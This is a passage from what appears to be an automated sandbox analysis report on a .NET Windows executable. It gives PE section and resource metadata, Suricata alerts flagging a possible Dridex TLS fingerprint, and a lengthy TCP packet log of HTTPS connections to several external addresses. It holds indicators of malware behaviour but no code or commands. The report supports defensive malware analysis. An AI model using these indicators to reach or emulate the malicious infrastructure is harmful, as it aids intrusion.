                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x53a80x4f.text
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x60000x58c.rsrc
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x80000xc.reloc
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x531c0x38.text
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                        Sections

                                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                        .text0x20000x34000x3400011f0b5a834ddae1739be2df85bbd209False0.48828125data5.376676584631292IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                        .rsrc0x60000x58c0x6006ce900aa6f5ef6addbe166008c1ea961False0.4134114583333333data4.023178449253273IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                        .reloc0x80000xc0x200ada691d652edc54d38296e18f64ff460False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                        Resources

                                                                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                        RT_VERSION0x60900x2fcdata0.43848167539267013
                                                                                                                                                                                                                        RT_MANIFEST0x639c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                                                                                                                                        Imports

                                                                                                                                                                                                                        DLLImport
                                                                                                                                                                                                                        mscoree.dll_CorExeMain

                                                                                                                                                                                                                        Network Behavior

                                                                                                                                                                                                                        Suricata IDS Alerts

                                                                                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                        2024-12-23T08:51:37.056484+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.84972137.27.43.98443TCP
                                                                                                                                                                                                                        2024-12-23T08:52:55.063421+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.84971237.27.43.98443TCP
                                                                                                                                                                                                                        2024-12-23T08:53:31.487765+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.84971637.27.43.98443TCP

                                                                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                                                                        TCP Packets

                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                        Dec 23, 2024 08:52:12.153805971 CET49708443192.168.2.820.233.83.145
                                                                                                                                                                                                                        Dec 23, 2024 08:52:12.153860092 CET4434970820.233.83.145192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:12.153928995 CET49708443192.168.2.820.233.83.145
                                                                                                                                                                                                                        Dec 23, 2024 08:52:12.167752028 CET49708443192.168.2.820.233.83.145
                                                                                                                                                                                                                        Dec 23, 2024 08:52:12.167783976 CET4434970820.233.83.145192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:13.744066000 CET4434970820.233.83.145192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:13.745650053 CET49708443192.168.2.820.233.83.145
                                                                                                                                                                                                                        Dec 23, 2024 08:52:13.749763012 CET49708443192.168.2.820.233.83.145
                                                                                                                                                                                                                        Dec 23, 2024 08:52:13.749790907 CET4434970820.233.83.145192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:13.750099897 CET4434970820.233.83.145192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:13.796804905 CET49708443192.168.2.820.233.83.145
                                                                                                                                                                                                                        Dec 23, 2024 08:52:13.839335918 CET4434970820.233.83.145192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:14.642132998 CET4434970820.233.83.145192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:14.642226934 CET4434970820.233.83.145192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:14.642292023 CET4434970820.233.83.145192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:14.642292023 CET49708443192.168.2.820.233.83.145
                                                                                                                                                                                                                        Dec 23, 2024 08:52:14.642333031 CET49708443192.168.2.820.233.83.145
                                                                                                                                                                                                                        Dec 23, 2024 08:52:14.648943901 CET49708443192.168.2.820.233.83.145
                                                                                                                                                                                                                        Dec 23, 2024 08:52:14.789015055 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:14.789072037 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:14.789148092 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:14.789518118 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:14.789530993 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:16.008466005 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:16.008687019 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:16.011010885 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:16.011039972 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:16.011457920 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:16.012974977 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:16.055342913 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:16.555512905 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:16.609487057 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:16.675122023 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:16.675137043 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:16.675158024 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:16.675168991 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:16.675199032 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:16.675204992 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:16.675234079 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:16.675261974 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:16.675296068 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:16.791966915 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:16.791995049 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:16.792067051 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:16.792068005 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:16.792150974 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:16.792210102 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:16.834165096 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:16.834194899 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:16.834250927 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:16.834331989 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:16.834372997 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:16.834397078 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:16.957138062 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:16.957163095 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:16.957294941 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:16.957326889 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:16.957372904 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:16.986608982 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:16.986637115 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:16.986763000 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:16.986841917 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:16.986911058 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.014595032 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.014626026 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.014755011 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.014832973 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.014909983 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.038577080 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.038604021 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.038705111 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.038736105 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.038808107 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.147576094 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.147603989 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.147706985 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.147789955 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.147851944 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.164896965 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.164928913 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.164985895 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.165010929 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.165044069 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.165069103 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.183530092 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.183557987 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.183649063 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.183720112 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.183779001 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.202028990 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.202054024 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.202120066 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.202174902 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.202197075 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.202229023 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.220546961 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.220598936 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.220649958 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.220726967 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.220767021 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.220792055 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.237714052 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.237755060 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.237835884 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.237907887 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.237942934 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.237967014 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.327958107 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.328005075 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.328185081 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.328223944 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.328334093 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.341501951 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.341542006 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.341691971 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.341737032 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.341818094 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.354293108 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.354326963 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.354415894 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.354434967 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.354470968 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.354470968 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.364768028 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.364804029 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.364870071 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.364886045 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.364912987 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.364938021 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.376883030 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.376923084 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.376974106 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.376990080 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.377021074 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.377038002 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.387955904 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.387999058 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.388071060 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.388087988 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.388114929 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.388133049 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.398730040 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.398765087 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.398812056 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.398824930 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.398849964 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.398971081 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.410218000 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.410255909 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.410315037 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.410346985 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.410377979 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.410398960 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.520895004 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.520942926 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.521059036 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.521115065 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.521152973 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.521172047 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.528073072 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.528096914 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.528177023 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.528198957 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.528227091 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.528249979 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.536319017 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.536345005 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.536429882 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.536457062 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.536484957 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.536511898 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.540446043 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.540494919 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.540528059 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.540543079 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.540601969 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.548156023 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.548178911 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.548228025 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.548243046 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.548273087 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.548312902 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.555834055 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.555855036 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.556021929 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.556068897 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.556124926 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.562570095 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.562592030 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.562649965 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.562666893 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.562695980 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.562716961 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.570641041 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.570661068 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.570794106 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.570811987 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.570867062 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.592964888 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.593072891 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.593189955 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.593317986 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.593976021 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:18.454502106 CET49710443192.168.2.8149.154.167.99
                                                                                                                                                                                                                        Dec 23, 2024 08:52:18.454555988 CET44349710149.154.167.99192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:18.454629898 CET49710443192.168.2.8149.154.167.99
                                                                                                                                                                                                                        Dec 23, 2024 08:52:18.466169119 CET49710443192.168.2.8149.154.167.99
                                                                                                                                                                                                                        Dec 23, 2024 08:52:18.466200113 CET44349710149.154.167.99192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:19.835577011 CET44349710149.154.167.99192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:19.835663080 CET49710443192.168.2.8149.154.167.99
                                                                                                                                                                                                                        Dec 23, 2024 08:52:19.883872032 CET49710443192.168.2.8149.154.167.99
                                                                                                                                                                                                                        Dec 23, 2024 08:52:19.883908987 CET44349710149.154.167.99192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:19.884351969 CET44349710149.154.167.99192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:19.884620905 CET49710443192.168.2.8149.154.167.99
                                                                                                                                                                                                                        Dec 23, 2024 08:52:19.886518955 CET49710443192.168.2.8149.154.167.99
                                                                                                                                                                                                                        Dec 23, 2024 08:52:19.927344084 CET44349710149.154.167.99192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:20.378458977 CET44349710149.154.167.99192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:20.378495932 CET44349710149.154.167.99192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:20.378539085 CET44349710149.154.167.99192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:20.378559113 CET44349710149.154.167.99192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:20.378606081 CET49710443192.168.2.8149.154.167.99
                                                                                                                                                                                                                        Dec 23, 2024 08:52:20.378654003 CET49710443192.168.2.8149.154.167.99
                                                                                                                                                                                                                        Dec 23, 2024 08:52:20.395453930 CET49710443192.168.2.8149.154.167.99
                                                                                                                                                                                                                        Dec 23, 2024 08:52:20.395488977 CET44349710149.154.167.99192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:20.571996927 CET49711443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:52:20.572046041 CET44349711104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:20.572118998 CET49711443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:52:20.572417974 CET49711443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:52:20.572432041 CET44349711104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:21.960961103 CET44349711104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:21.961100101 CET49711443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:52:21.964797974 CET49711443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:52:21.964807987 CET44349711104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:21.965030909 CET44349711104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:21.965081930 CET49711443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:52:21.965481997 CET49711443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:52:22.011321068 CET44349711104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:22.811368942 CET44349711104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:22.811397076 CET44349711104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:22.811417103 CET44349711104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:22.811600924 CET49711443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:52:22.811634064 CET44349711104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:22.811688900 CET49711443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:52:22.940264940 CET44349711104.102.49.254192.168.2.8
